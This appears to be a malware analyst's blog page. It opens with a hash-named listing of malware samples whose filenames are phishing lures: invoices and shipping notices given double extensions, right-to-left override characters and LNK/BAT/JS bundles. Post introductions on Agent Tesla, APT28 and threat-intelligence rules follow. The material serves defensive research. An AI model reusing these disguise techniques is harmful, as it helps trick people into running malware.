.\ee81765b79c8738358a8c948b2f776797bf2f0393084ae9d53aad666b3afd58eee81765b79c8738358a8c948b2f776797bf2f0393084ae9d53aad666b3afd58e_1661938886['.\ee81765b79c8738358a8c948b2f776797bf2f0393084ae9d53aad666b3afd58e_1661938886/Your DHL Shipment Notification.pdf.exe']
.\ef7156bebc26f16abc0cf9b8a8f18d18daf872cd5e0eabec4cf2a67e7906ad3cef7156bebc26f16abc0cf9b8a8f18d18daf872cd5e0eabec4cf2a67e7906ad3c_1661938886"['.\ef7156bebc26f16abc0cf9b8a8f18d18daf872cd5e0eabec4cf2a67e7906ad3c_1661938886/Statement \u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202efdp.exe', '.\ef7156bebc26f16abc0cf9b8a8f18d18daf872cd5e0eabec4cf2a67e7906ad3c_1661938886/Statement02 \u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202e\u202efdp.exe']"
.\f01d39aac99ccb72d2da783605b5d3d398bf70fc9da7e8f4a1dc09f6217f3c7df01d39aac99ccb72d2da783605b5d3d398bf70fc9da7e8f4a1dc09f6217f3c7d_1661938886"['.\f01d39aac99ccb72d2da783605b5d3d398bf70fc9da7e8f4a1dc09f6217f3c7d_1661938886/VPO_SP.8696_Data_rev_2_BL54110,pdf.exe']"
.\f0340fb13b628c9ae61a3c7a3ebb21e50d6b30fd884f1be7befcc03e142c733af0340fb13b628c9ae61a3c7a3ebb21e50d6b30fd884f1be7befcc03e142c733a_1661938886['.\f0340fb13b628c9ae61a3c7a3ebb21e50d6b30fd884f1be7befcc03e142c733a_1661938886/Payment Slip.exe']
.\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ecf03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886"['.\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886/invoice-not-paid-date08-08-22-pdf.lnk', '.\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886/at/but.txt', '.\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886/at/goOtherManyAHis.txt', '.\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886/at/makeComeHaveButOr.bat', '.\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886/at/thanAForFromAnd.js', '.\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886/at/time.gif']".\f03fb6dbad7bb025996eca29a4baeacc2a5d095360005da2e4dad5947e9208ec_1661938886/invoice-not-paid-date08-08-22-pdf.lnkat/makeComeHaveButOr.bat
.\f04bdae9705e43b23533f7e1e94530989217dc0be24dbc3347d4b07097d715e4f04bdae9705e43b23533f7e1e94530989217dc0be24dbc3347d4b07097d715e4_1661938886"['.\f04bdae9705e43b23533f7e1e94530989217dc0be24dbc3347d4b07097d715e4_1661938886/METAX INKÖPSORDER HTT287,pdf.exe']"
.\f1544ea7268044e734b02004ce201d4b4a0e39e2a66316a5dd921c3c0213c112f1544ea7268044e734b02004ce201d4b4a0e39e2a66316a5dd921c3c0213c112_1661938886['.\f1544ea7268044e734b02004ce201d4b4a0e39e2a66316a5dd921c3c0213c112_1661938886/commercial invoice.exe']
.\f2ad03f0c9122e98a888fd4e7b6bd8c7a7de7b79d550290fc8cdaa2393fe85e4f2ad03f0c9122e98a888fd4e7b6bd8c7a7de7b79d550290fc8cdaa2393fe85e4_1661938886['.\f2ad03f0c9122e98a888fd4e7b6bd8c7a7de7b79d550290fc8cdaa2393fe85e4_1661938886/hesaphareketi-01.exe;1']
.\f36287dfa3f5f49902b7c2c72cffaecd1c15f4fe87a7b6cab439660a0e2d9ca2f36287dfa3f5f49902b7c2c72cffaecd1c15f4fe87a7b6cab439660a0e2d9ca2_1661938886"['.\f36287dfa3f5f49902b7c2c72cffaecd1c15f4fe87a7b6cab439660a0e2d9ca2_1661938886/documents.lnk', '.\f36287dfa3f5f49902b7c2c72cffaecd1c15f4fe87a7b6cab439660a0e2d9ca2_1661938886/one/firstCome.js', '.\f36287dfa3f5f49902b7c2c72cffaecd1c15f4fe87a7b6cab439660a0e2d9ca2_1661938886/one/himThem.txt', '.\f36287dfa3f5f49902b7c2c72cffaecd1c15f4fe87a7b6cab439660a0e2d9ca2_1661938886/one/willGo.bat']".\f36287dfa3f5f49902b7c2c72cffaecd1c15f4fe87a7b6cab439660a0e2d9ca2_1661938886/documents.lnkone/willGo.bat
.\f4e41ab8a121a596f68c351eaa149ef1915f23a8a5ef2f518dffa8714bf568e2f4e41ab8a121a596f68c351eaa149ef1915f23a8a5ef2f518dffa8714bf568e2_1661938886['.\f4e41ab8a121a596f68c351eaa149ef1915f23a8a5ef2f518dffa8714bf568e2_1661938886/DH73893063PDF.vbs']
.\f4ea575857b51ffe7d683a223541fd34b138dc41edc6f10f8ce284e8e07bb9c4f4ea575857b51ffe7d683a223541fd34b138dc41edc6f10f8ce284e8e07bb9c4_1661938886['.\f4ea575857b51ffe7d683a223541fd34b138dc41edc6f10f8ce284e8e07bb9c4_1661938886/YouTube_Downloader.exe']
.\f65a76cbf6f09ed3e574d8098b88417f46aa5080c2fa8f21a7d959ce4d8fbffff65a76cbf6f09ed3e574d8098b88417f46aa5080c2fa8f21a7d959ce4d8fbfff_1661938886['.\f65a76cbf6f09ed3e574d8098b88417f46aa5080c2fa8f21a7d959ce4d8fbfff_1661938886/New Inquiry.exe;1']
.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886"['.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/documents.lnk', '.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/then/by.txt', '.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/then/day.gif', '.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/then/he.png', '.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/then/meVeryFirstAboutThose.js', '.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/then/theirThenWhatOrMake.bat', '.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/then/theseOfISayOne.txt', '.\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/then/use.txt']".\f6ea30a914c47c36a9ee8f501de9b2039a55d5b77f57a36d2709efd576560c92_1661938886/documents.lnkthen/theirThenWhatOrMake.bat
.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886"['.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/Invoice-August-09-2022pdf.lnk', '.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/your/canFirstCanMeSay.bat', '.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/your/give.txt', '.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/your/say.txt', '.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/your/tell.txt', '.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/your/thanNotThatToWill.js', '.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/your/thing.gif', '.\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/your/wantByKnowOneWhat.txt']".\fa52804ceae48efae06dced2e277db23adb100d4cae4c847a2ee4b0ede08e729_1661938886/Invoice-August-09-2022pdf.lnkyour/canFirstCanMeSay.bat
.\fabc873f3d9dad0d0149c71f291bf8e69f4c536cfcf34adb8909115da7edc0fffabc873f3d9dad0d0149c71f291bf8e69f4c536cfcf34adb8909115da7edc0ff_1661938886['.\fabc873f3d9dad0d0149c71f291bf8e69f4c536cfcf34adb8909115da7edc0ff_1661938886/revised order_pdf.exe']
.\fd3b867616627863fd2b2eb0c11e95891f1c3f75f21cd8044e55e2aeef6f28e5fd3b867616627863fd2b2eb0c11e95891f1c3f75f21cd8044e55e2aeef6f28e5_1661938886['.\fd3b867616627863fd2b2eb0c11e95891f1c3f75f21cd8044e55e2aeef6f28e5_1661938886/RQ 8129.exe']
.\fde72d6ef337876ab9159f2d3c1064908fea028bb028b433020095435566f73cfde72d6ef337876ab9159f2d3c1064908fea028bb028b433020095435566f73c_1661938886"['.\fde72d6ef337876ab9159f2d3c1064908fea028bb028b433020095435566f73c_1661938886/VPO_SP.9686_Flex_rev_2_BL65338453,pdf.exe']"
.\ff1db5b5b82267b468157deaf685c9a350cda21577680f27a530615158b3be9aff1db5b5b82267b468157deaf685c9a350cda21577680f27a530615158b3be9a_1661938886"['.\ff1db5b5b82267b468157deaf685c9a350cda21577680f27a530615158b3be9a_1661938886/ORDEN DE COMPRA DE A.W. Chesterton,pdf.exe']"
.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886"['.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/documents.lnk', '.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/then/by.txt', '.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/then/day.gif', '.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/then/he.png', '.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/then/himTellYouSoAt.js', '.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/then/inUseIntoOtherWho.txt', '.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/then/toLikeTheirThemBecause.bat', '.\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/then/use.txt']".\ffa44e4830533e4eee7ce428c9ca67a4bf6777a970356d91fde161822ed6e218_1661938886/documents.lnkthen/toLikeTheirThemBecause.bat
.\fff2feff5e09295925e2c20a94261320efe9d735e97dc910060fc17c1de283e3fff2feff5e09295925e2c20a94261320efe9d735e97dc910060fc17c1de283e3_1661938886['.\fff2feff5e09295925e2c20a94261320efe9d735e97dc910060fc17c1de283e3_1661938886/Oferta XL-PO#5847_pdf.exe']

Rerefences

· 5 min read
Mert Degirmenci

Introduction

When I saw the attack vector for the first time, I realized that it is an excellent case to demonstrate the potential of the ATLAS. So, after finishing the analysis and the ATLAS rule, I've decided to write a blog post with a detailed explanation of creating the ATLAS rule.

· One min read
Mert Degirmenci

Introduction

I am passionate about developing a standalone version of the distinct capabilities of the malware, attack vector that I analyze. It helps me to understand the specimen much more deeply. The other advantage is that your code breaks when the actor updates the capability. That means I can track them. In one of my other blog posts, I described how I tracked two highly active malware families, Remcos and Emotet, for months. It is for fun and profit.

· 4 min read
Mert Degirmenci

Introduction

In a world full of threats that target indiscriminately every bit and byte of our society, it is curial to have decent intelligence and respond accordingly. These threats often use specialized tools, named malicious software or malware, to achieve from cybercrime to espionage and destructive purposes. In this cat and mouse game, VirusTotal, which was created in 2004, has become the source of malware intelligence, and it provides myriads of information. By the platform's maturation, it has gained advanced capabilities that the analyst uses to enlighten the knowledge gaps.

· 13 min read
Mert Degirmenci

Introduction

Albert Lamorisse invented Risk game in 1957. According to Wikipedia,

Risk is a strategy board game of diplomacy, conflict and conquest for two to six players. The standard version is played on a board depicting a political map of Earth, divided into forty-two territories, which are grouped into six continents. Turn rotates among players who control armies of playing pieces with which they attempt to capture territories from other players, with results determined by dice rolls. Players may form and dissolve alliances during the course of the game. The goal of the game is to occupy every territory on the board and in doing so, eliminate the other players.

· 13 min read
Mert Degirmenci

Introduction

Agent.Tesla

Agent.Tesla is a piece of malware that is active since 2014. According to an article that is published on 'krebsonsecurity.com', access right is acquired by paying subscription fee via bitcoin and by the time of the article, it had more than 6,300 customers. 7/24 technical support via Discord channel is also included.

· 10 min read
Mert Degirmenci

The tag "Late Night Show" because, the attack origins at the end of 2018 and apparently the Show is very late.

Introduction

APT28

The group, also known as FancyBear, Sofacy Group, Sednit..., starts its activity in the mid-2000s. They target government, military and security organizations especially NATO-aligned states.

APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. This group reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.